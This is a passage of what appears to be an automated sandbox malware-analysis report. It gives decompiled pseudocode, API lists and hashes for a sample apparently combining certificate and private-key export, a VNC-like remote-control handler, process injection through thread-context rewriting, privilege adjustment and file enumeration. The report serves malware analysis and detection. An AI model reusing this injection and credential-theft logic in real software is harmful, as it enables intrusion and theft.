    										} while (_t376 < _t519);
    										goto L76;
    									}
    									_t311 = _t303 - 1;
    									__eflags = _t311;
    									if(_t311 == 0) {
    										_t312 = L012B19E7(_v8,  &_v116, 7, _t546);
    										__eflags = _t312;
    										if(_t312 == 0) {
    											goto L103;
    										}
    										__eflags = _v116 - _t376;
    										 *((intOrPtr*)(_a4 + 0x14))((_t312 & 0xffffff00 | _v116 != _t376) & 0x000000ff);
    										continue;
    									}
    									_t319 = _t311 - 1;
    									__eflags = _t319;
    									if(_t319 == 0) {
    										_t528 =  &_v24;
    										_t320 = L012B19E7(_v8, _t528, 5, _t546);
    										__eflags = _t320;
    										if(_t320 == 0) {
    											goto L103;
    										}
    										asm("rol word [ebp-0x13], 0x8");
    										asm("rol word [ebp-0x11], 0x8");
    										_v16 = _v16 & _t376;
    										_t553 = 0x8000;
    										_t321 = GetSystemMetrics(0x17);
    										__eflags = _t321;
    										_t529 = _t528 & 0xffffff00 | _t321 != 0x00000000;
    										__eflags = _v23 - _v47;
    										if(_v23 != _v47) {
    											L50:
    											_t553 = 0x8001;
    											L51:
    											_t459 = _v48;
    											_t324 = _v24 & 0x00000001;
    											__eflags = _t324 - (_t459 & 0x00000001);
    											if(_t324 != (_t459 & 0x00000001)) {
    												__eflags = _t324;
    												if(_t324 == 0) {
    													__eflags = _t529;
    													_t349 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
    													__eflags = _t349;
    												} else {
    													__eflags = _t529;
    													_t349 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
    												}
    												_t553 = _t553 | _t349;
    												__eflags = _t553;
    											}
    											_t326 = _v24 & 0x00000004;
    											__eflags = _t326 - (_t459 & 0x00000004);
    											if(_t326 != (_t459 & 0x00000004)) {
    												__eflags = _t326;
    												if(_t326 == 0) {
    													__eflags = _t529;
    													_t340 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
    													__eflags = _t340;
    												} else {
    													__eflags = _t529;
    													_t340 = ((0 | _t529 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
    												}
    												_t553 = _t553 | _t340;
    												__eflags = _t553;
    											}
    											_t328 = _v24 & 0x00000002;
    											__eflags = _t328 - (_t459 & 0x00000002);
    											if(_t328 != (_t459 & 0x00000002)) {
    												__eflags = _t328;
    												_t553 = _t553 | ((0 | _t328 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
    												__eflags = _t553;
    											}
    											__eflags = _v24 & 0x00000008;
    											if((_v24 & 0x00000008) != 0) {
    												_t553 = _t553 | 0x00000800;
    												__eflags = _t553;
    												_v16 = 0x78;
    											}
    											__eflags = _v24 & 0x00000010;
    											if((_v24 & 0x00000010) != 0) {
    												__eflags = _t553;
    												_v16 = 0xffffff88;
    											}
    											L012B1947( &_v48,  &_v24, 5);
    											 *((intOrPtr*)(_a4 + 0x18))(_v23 & 0x0000ffff, _v21 & 0x0000ffff, _v16);
    											continue;
    										}
    										__eflags = _v21 - _v45;
    										if(_v21 == _v45) {
    											goto L51;
    										}
    										goto L50;
    									}
    									__eflags = _t319 != 1;
    									if(_t319 != 1) {
    										goto L103;
    									}
    									_t356 = L012B19E7(_v8,  &_v120, 3, _t546);
    									__eflags = _t356;
    									if(_t356 == 0) {
    										goto L103;
    									}
    									_t357 = L012B19E7(_v8,  &_v40, 4, _t546);
    									__eflags = _t357;
    									if(_t357 == 0) {
    										goto L103;
    									}
    									_v40 = (_v40 & 0x00ff0000 | _v40 >> 0x00000010) >> 0x00000008 | (_v40 << 0x00000010 | _v40 & 0x0000ff00) << 0x00000008;
    									_t391 = L012B1C17(((_v40 & 0x00ff0000 | _v40 >> 0x00000010) >> 0x00000008 | (_v40 << 0x00000010 | _v40 & 0x0000ff00) << 0x00000008) + 1);
    									__eflags = _t391;
    									if(_t391 == 0) {
    										__eflags = 0;
    										L012B1933(0);
    										goto L103;
    									}
    									_t365 = L012B19E7(_v8, _t391, _v40, _t546);
    									__eflags = _t365;
    									if(_t365 == 0) {
    										goto L103;
    									}
    									 *((intOrPtr*)(_a4 + 0x1c))(_t391);
    									L012B1933(_t391);
    								}
    								__eflags =  *(_t559 + 0x1c);
    							} while ( *(_t559 + 0x1c) != 0);
    							_t295 = L012B1C17(0x400);
    							 *(_t559 + 0x1c) = _t295;
    							__eflags = _t295;
    						} while (_t295 != 0);
    						goto L103;
    					}
    				}
    			}

    APIs
    • WSAGetLastError.WS2_32(00000000,00000000,00000000,00000031,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB23F
    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB25A
    • ReleaseMutex.KERNEL32(?,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB2F1
    • GetSystemMetrics.USER32 ref: 012CB404
    • ReleaseMutex.KERNEL32(00000000,?,00000010,00000000,00000010,?,?,00000001,?,00000018,?,00000020,00000010), ref: 012CB782
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: MutexRelease$ErrorLastMetricsObjectSingleSystemWait
    • String ID: RFB $RFB 003.003$x
    • API String ID: 1533360952-1851049915
    • Opcode ID: afcf159df9564ba54f221cbc338c6f7ecdf201a49181d19df21a5c1f103524da
    • Instruction ID: ed2dfa293be76cbb3fb1ba8e39c613806ca691a225ea809f510bbbc64c7ed821
    • Opcode Fuzzy Hash: afcf159df9564ba54f221cbc338c6f7ecdf201a49181d19df21a5c1f103524da
    • Instruction Fuzzy Hash: 8D324E31E2020A9BDF18DFA8C8927FD7BB2EF95780F18465DDB41A7281DB748949C750
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 012B3829
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 012B3845
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 012B3850
    • PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 012B3887
    • PFXExportCertStoreEx.CRYPT32(00000000,?,?,00000000,00000004), ref: 012B38B0
    • CharLowerW.USER32(?,000000FF), ref: 012B38CB
    • GetSystemTime.KERNEL32(?), ref: 012B38D5
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 012B394A
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
    • String ID:
    • API String ID: 3751268071-0
    • Opcode ID: 49ebda7f4615f215f544573cbb4eb02f2fad3965ad114fad9527f42b4fcbad83
    • Instruction ID: 20a44b3edf0ad725c582de09b4e028c35b046ee16cdcaafcd69a0e87579aa600
    • Opcode Fuzzy Hash: 49ebda7f4615f215f544573cbb4eb02f2fad3965ad114fad9527f42b4fcbad83
    • Instruction Fuzzy Hash: 10417FB2510249AADB21DFA4DCC4DEE3BACBF18790F14442AFA15D7141E635D945CB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E012BD44A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				void* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAW _v608;
    				short _v1128;
    				void* _t49;
    				signed int _t58;
    				long _t65;
    				signed char _t67;
    				signed int _t84;
    
    				_v16 = __edx;
    				_v12 = __ecx;
    				_t49 = L012B1203( &_v1128, __ecx, "*");
    				if(_t49 == 0) {
    					L25:
    					return _t49;
    				}
    				_t49 = FindFirstFileW( &_v1128,  &_v608);
    				_v8 = _t49;
    				if(_t49 == 0xffffffff) {
    					goto L25;
    				} else {
    					_t67 = _a8;
    					while(1) {
    						_t84 = 0;
    						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
    							break;
    						}
    						if(L012B13A7( &(_v608.cFileName)) != 0) {
    							L23:
    							if(FindNextFileW(_v8,  &_v608) != 0) {
    								continue;
    							}
    							break;
    						}
    						_t58 = _v608.dwFileAttributes & 0x00000010;
    						if(_t58 == 0 || (_t67 & 0x00000002) == 0) {
    							if(_t58 != _t84 || (_t67 & 0x00000004) == 0) {
    								goto L17;
    							} else {
    								goto L10;
    							}
    						} else {
    							L10:
    							if(_a4 <= _t84) {
    								L17:
    								if((_v608.dwFileAttributes & 0x00000010) != 0 && (_t67 & 0x00000001) != 0 && L012B1203( &_v1128, _v12,  &(_v608.cFileName)) != 0) {
    									_t102 = _a24;
    									if(_a24 != 0) {
    										Sleep(_a24);
    									}
    									L012B1A23( &_v1128, _v16, _t102, _a4, _t67, _a12, _a16, _a20, _a24, _a28);
    								}
    								goto L23;
    							}
    							while(PathMatchSpecW( &(_v608.cFileName),  *(_v16 + _t84 * 4)) == 0) {
    								_t84 = _t84 + 1;
    								if(_t84 < _a4) {
    									continue;
    								}
    								goto L17;
    							}
    							_t65 = _a12(_a16);
    							__eflags = _t65;
    							if(_t65 == 0) {
    								break;
    							}
    							__eflags = _a28;
    							if(_a28 != 0) {
    								Sleep(_a28);
    							}
    							goto L17;
    						}
    					}
    					return FindClose(_v8);
    				}
    			}

    APIs
    • FindFirstFileW.KERNEL32(?,?,012D7428), ref: 012BD481
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 012BD4AA
    • PathMatchSpecW.SHLWAPI(?,?), ref: 012BD4F9
    • Sleep.KERNEL32(00000000), ref: 012BD527
    • Sleep.KERNEL32(00000000,?), ref: 012BD559
    • FindNextFileW.KERNEL32(?,?), ref: 012BD586
    • FindClose.KERNEL32(?), ref: 012BD597
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Find$FileSleep$CloseFirstMatchNextObjectPathSingleSpecWait
    • String ID:
    • API String ID: 1935094245-0
    • Opcode ID: 5592c7c1fd21cad0576a62e02190341b5c7e555a5d2f9a5da750f122f957bbe2
    • Instruction ID: 7c9a99fba6d4bd5b705fcada813b035fbc69ef527d39d8e2a1e227f4ec0e4565
    • Opcode Fuzzy Hash: 5592c7c1fd21cad0576a62e02190341b5c7e555a5d2f9a5da750f122f957bbe2
    • Instruction Fuzzy Hash: 84417E7191021EAFDF21DF98EC88BED7B79EF4438CF104095EA44A21A1D7359A55CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E012B4E98(WCHAR* __ecx, signed char __edx) {
    				signed char _v8;
    				void* _v12;
    				signed int _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t27;
    				WCHAR* _t30;
    
    				_t27 = 0;
    				_v8 = __edx;
    				_t30 = __ecx;
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
    					asm("sbb eax, eax");
    					_v16 =  ~(_v8 & 0x000000ff) & 0x00000002;
    					_v28.PrivilegeCount = 1;
    					if(LookupPrivilegeValueW(_t27, _t30,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t27,  &_v28, _t27, _t27, _t27) != 0 && GetLastError() == 0) {
    						_t27 = 1;
    					}
    					CloseHandle(_v12);
    					return _t27;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 012B4EAE
    • OpenThreadToken.ADVAPI32(00000000), ref: 012B4EB5
    • OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 012B4EC7
    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 012B4EF0
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,?,?), ref: 012B4F05
    • GetLastError.KERNEL32(?,?), ref: 012B4F0F
    • CloseHandle.KERNEL32(?,?,?), ref: 012B4F1E
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 2724707430-0
    • Opcode ID: 21ae846b4920c7d4b1c7bee11282a11251205b7c972415f3adf7474f03b73ed8
    • Instruction ID: 5a89ea454dbcae2abd2f4e3711b486de8873d2c3812a3bb89090648f9dc5f6ff
    • Opcode Fuzzy Hash: 21ae846b4920c7d4b1c7bee11282a11251205b7c972415f3adf7474f03b73ed8
    • Instruction Fuzzy Hash: 51115671A1514ABFEB209BB9ECCDAEF7B6CEF01785F010161F512E6045D63089448761
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E012C2F67() {
    				char _v5;
    				signed int _v12;
    				int _v16;
    				void* _v20;
    				int _v24;
    				char _v28;
    				void** _v576;
    				void* _v584;
    				void* __edi;
    				void* _t39;
    				int _t43;
    				signed int _t45;
    				long _t51;
    				signed int* _t52;
    				void** _t53;
    				void** _t54;
    				void** _t56;
    				void** _t60;
    				void* _t68;
    				void** _t69;
    
    				_v5 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				while(1) {
    					_t39 = CreateToolhelp32Snapshot(2, 0);
    					_v20 = _t39;
    					_v24 = 0;
    					if(_t39 == 0xffffffff) {
    						break;
    					} else {
    						_push( &_v584);
    						_v584 = 0x22c;
    						_t43 = Process32FirstW(_v20);
    					}
    					while(_t43 != 0) {
    						_t60 = _v576;
    						__eflags = _t60;
    						if(_t60 <= 0) {
    							L18:
    							_t43 = Process32NextW(_v20,  &_v584);
    							continue;
    						}
    						__eflags = _t60 -  *0x12dca00; // 0x0
    						if(__eflags == 0) {
    							goto L18;
    						}
    						_t45 = 0;
    						__eflags = _v12;
    						if(__eflags <= 0) {
    							L8:
    							_t68 = L012B1C44(_t60, _t66, _t68, __eflags);
    							__eflags = _t68;
    							if(_t68 == 0) {
    								goto L18;
    							}
    							_t66 =  &_v28;
    							_t69 = L012B114F(_v576,  &_v28);
    							__eflags = _t69;
    							if(_t69 == 0) {
    								L17:
    								CloseHandle(_t68);
    								goto L18;
    							} else {
    								__eflags = _v28 -  *0x12dc748; // 0x0
    								if(__eflags == 0) {
    									_t51 = GetLengthSid( *_t69);
    									__eflags = _t51 -  *0x12dc740;
    									if(_t51 ==  *0x12dc740) {
    										_t52 =  *0x12dc73c; // 0x0
    										_t66 =  *_t52;
    										_t53 = L012B1735( *_t69,  *_t52, _t51);
    										__eflags = _t53;
    										if(_t53 == 0) {
    											_t66 = 4 + _v12 * 4;
    											_t54 = L012B1C26( &_v16, 4 + _v12 * 4);
    											__eflags = _t54;
    											if(_t54 != 0) {
    												_t66 = _v12;
    												_v12 = _v12 + 1;
    												_v24 = _v24 + 1;
    												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v576;
    												_t56 = E012C2ED8(_v16, _v576, _t68, 0);
    												__eflags = _t56;
    												if(_t56 != 0) {
    													_v5 = 1;
    												}
    											}
    										}
    									}
    								}
    								L012B1933(_t69);
    								goto L17;
    							}
    						} else {
    							goto L6;
    						}
    						while(1) {
    							L6:
    							_t66 = _v16;
    							__eflags =  *((intOrPtr*)(_t66 + _t45 * 4)) - _t60;
    							if( *((intOrPtr*)(_t66 + _t45 * 4)) == _t60) {
    								goto L18;
    							}
    							_t45 = _t45 + 1;
    							__eflags = _t45 - _v12;
    							if(__eflags < 0) {
    								continue;
    							}
    							goto L8;
    						}
    						goto L18;
    					}
    					CloseHandle(_v20);
    					if(_v24 != 0) {
    						continue;
    					}
    					break;
    				}
    				L012B1933(_v16);
    				return _v5;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 012C2F81
    • Process32FirstW.KERNEL32(?,?), ref: 012C2FA9
    • GetLengthSid.ADVAPI32(00000000,00000002,00000000), ref: 012C3016
    • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 012C307F
    • Process32NextW.KERNEL32(?,0000022C), ref: 012C308F
    • CloseHandle.KERNEL32(?,00000002,00000000), ref: 012C309F
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CloseHandleProcess32$CreateFirstLengthNextSnapshotToolhelp32
    • String ID:
    • API String ID: 265895845-0
    • Opcode ID: e5e39aa0dd9db418a5026c10920a3bed1fc45d5c799047474f0d5d79d405ce06
    • Instruction ID: 0573122afcb385d0eabe479d8a9fdf3232d1aface6b3e0836affe48994f82e97
    • Opcode Fuzzy Hash: e5e39aa0dd9db418a5026c10920a3bed1fc45d5c799047474f0d5d79d405ce06
    • Instruction Fuzzy Hash: 7A41783191011BEFDF20EFA8E884ABDBB7AFF11744F2086ACD611A7254DB315A85CB11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E012C2C77(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
    				struct _CONTEXT _v720;
    				void* __edi;
    				intOrPtr _t30;
    				long _t33;
    				void** _t43;
    				void* _t46;
    				void* _t47;
    				void** _t48;
    				void* _t50;
    				signed int _t52;
    				void* _t62;
    
    				_t46 = __edx;
    				_t43 = _a8;
    				_t48 = _a4;
    				_t30 =  *0x12dc7b4(_t48, _t43, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
    				_a40 = _t30;
    				if(_t30 >= 0 && (_a32 & 0x00000001) != 0 && _t48 != 0 && _t43 != 0 && L012B150A() != 0) {
    					_t33 = GetProcessId( *_t48);
    					_t59 = _t33;
    					if(_t33 != 0) {
    						_t47 = L012B1C44(_t33, _t46, _t48, _t59);
    						_a44 = _t47;
    						_t60 = _t47;
    						if(_t47 != 0) {
    							_t50 = L012B1A05( *_t48, _t47, _t60, 0);
    							_a32 = _t50;
    							_t52 = _t50 -  *0x12dc74c + E012B1474;
    							_v720.ContextFlags = 0x10003;
    							if(GetThreadContext( *_t43,  &_v720) == 0) {
    								L12:
    								VirtualFreeEx( *_t48, _a32, 0, 0x8000);
    							} else {
    								_t62 = _v720.Eip -  *0x12dc7bc; // 0x770fba60
    								if(_t62 != 0) {
    									goto L12;
    								} else {
    									if(( *0x12dc738 & 0x00000010) != 0) {
    										_t52 = _t52 ^ _v720.Eax;
    									}
    									_v720.Eax = _t52;
    									_v720.ContextFlags = 0x10002;
    									if(SetThreadContext( *_t43,  &_v720) == 0) {
    										goto L12;
    									}
    								}
    							}
    							CloseHandle(_a44);
    						}
    					}
    				}
    				return _a40;
    			}

    APIs
    • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 012C2CA5
    • GetProcessId.KERNEL32(?), ref: 012C2CDF
    • GetThreadContext.KERNEL32(?,?,00000000), ref: 012C2D2F
    • SetThreadContext.KERNEL32(?,00010003), ref: 012C2D6F
    • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000), ref: 012C2D85
    • CloseHandle.KERNEL32(?), ref: 012C2D8E
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: ContextProcessThread$CloseCreateFreeHandleUserVirtual
    • String ID:
    • API String ID: 276279584-0
    • Opcode ID: 4599f6b93c4f9e6f50843a2ce71bd4ee573485e35cfcb9379bd123361a2c39e4
    • Instruction ID: cebc629a33c5c244455ea1dd63e8464bdd38c84b3b74bf045e11157b872c353e
    • Opcode Fuzzy Hash: 4599f6b93c4f9e6f50843a2ce71bd4ee573485e35cfcb9379bd123361a2c39e4
    • Instruction Fuzzy Hash: 7A317A3151120AEBEF219F68E848BE93BBAEF58744F154168FF08A6158CB31D860CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 012B48C1
    • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 012B48D9
    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 012B48F5
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 012B490D
    • CryptDestroyHash.ADVAPI32(?), ref: 012B4924
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 012B492E
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: dd3ff2d3e3a5ddbb13ef073cedc3ef4992f81c678968dd67f55cde57c358b0f4
    • Instruction ID: b52f671e5a4ba60eb5fe9655d09d55b539a3d2e893092b5fca5426bbde2e627e
    • Opcode Fuzzy Hash: dd3ff2d3e3a5ddbb13ef073cedc3ef4992f81c678968dd67f55cde57c358b0f4
    • Instruction Fuzzy Hash: 7A1148B1C0514EBFEF129BD4EC89AEEBF7DFB08341F104450F642A5156C3328A549B21
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E012C87ED(signed int* __ecx, signed char __edx) {
    				signed int _v8;
    				char _v9;
    				signed int _v16;
    				char _v24;
    				char _v68;
    				char _v552;
    				char _v556;
    				short _v588;
    				void* __edi;
    				signed int _t60;
    				signed int _t62;
    				signed int _t63;
    				signed short _t70;
    				signed int _t91;
    				signed short _t93;
    				signed int* _t122;
    				void* _t126;
    
    				_t122 = __ecx;
    				_v16 = __edx;
    				_t93 = 1;
    				_v9 = 0;
    				if( *((intOrPtr*)(__ecx)) == 0) {
    					_t91 = L012B1A96();
    					 *_t122 = _t91;
    					if(_t91 == 0) {
    						return 0;
    					}
    					_v9 = 1;
    				}
    				__eflags = _v16 & 0x00000001;
    				if(__eflags == 0) {
    					L9:
    					__eflags = _v16 & 0x00000002;
    					if((_v16 & 0x00000002) != 0) {
    						_t15 =  &_v8;
    						 *_t15 = _v8 & 0x00000000;
    						__eflags =  *_t15;
    						_t93 = L012B1564(_t122, 0x2713, 0x20000,  &_v8, 4);
    					}
    					L11:
    					__eflags = _v16 & 0x00000004;
    					if((_v16 & 0x00000004) == 0) {
    						L16:
    						__eflags = _t93;
    						if(_t93 == 0) {
    							L31:
    							__eflags = _v9 - 1;
    							if(_v9 == 1) {
    								L012B1933( *_t122);
    								 *_t122 =  *_t122 & 0x00000000;
    								__eflags =  *_t122;
    							}
    							L33:
    							return _t93;
    						}
    						__eflags = _v16 & 0x00000008;
    						if((_v16 & 0x00000008) == 0) {
    							L20:
    							__eflags = _t93;
    							if(_t93 == 0) {
    								goto L31;
    							}
    							__eflags = _v16 & 0x00000010;
    							if((_v16 & 0x00000010) == 0) {
    								L28:
    								__eflags = _t93;
    								if(_t93 == 0) {
    									goto L31;
    								}
    								__eflags = _v16 & 0x00000020;
    								if((_v16 & 0x00000020) != 0) {
    									E012C871F(_t122, _t122, 2);
    									E012C871F(_t122, _t122, 0x17);
    								}
    								goto L33;
    							}
    							_t60 = GetModuleFileNameW(0,  &_v588, 0x103);
    							_v8 = _t60;
    							__eflags = _t60;
    							if(_t60 != 0) {
    								__eflags = 0;
    								 *((short*)(_t126 + _t60 * 2 - 0x248)) = 0;
    								_t93 = L012B1AA0(_t122, 0x271e, 0, 0x20000,  &_v588);
    							}
    							_v8 = 0x104;
    							__eflags = _t93;
    							if(_t93 == 0) {
    								goto L31;
    							} else {
    								_push( &_v8);
    								_t62 =  &_v588;
    								_push(_t62);
    								_push(2);
    								L012D24C6();
    								__eflags = _t62;
    								if(_t62 != 0) {
    									_t63 = _v8;
    									__eflags = _t63;
    									if(_t63 != 0) {
    										__eflags = 0;
    										 *((short*)(_t126 + _t63 * 2 - 0x248)) = 0;
